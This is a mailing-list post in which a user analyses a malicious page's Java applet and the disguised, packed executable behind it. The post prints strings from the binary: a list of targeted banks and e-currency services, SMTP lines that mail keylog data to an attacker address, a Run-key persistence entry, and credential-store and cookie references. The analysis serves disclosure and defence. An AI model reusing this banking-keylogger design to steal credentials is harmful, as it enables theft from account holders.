[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <402FC40D.752.65AE52B@localhost>
From: n.teusink at planet.nl (n.teusink@...net.nl)
Subject: Re: http://federalpolice.com:article872@...5686747
>From the source of that page:
APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1
BlackBox.class is detected immediately by my virusscanner as ClassLoader/E, more
info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with
FSG.
Interresting pieces of output from strings on the decompressed exe:
----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
\kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan@...l.ru>
RCPT TO:<pentasatan@...l.ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END
I think you can draw your own conclusions about this file.
Niels
Powered by blists - more mailing lists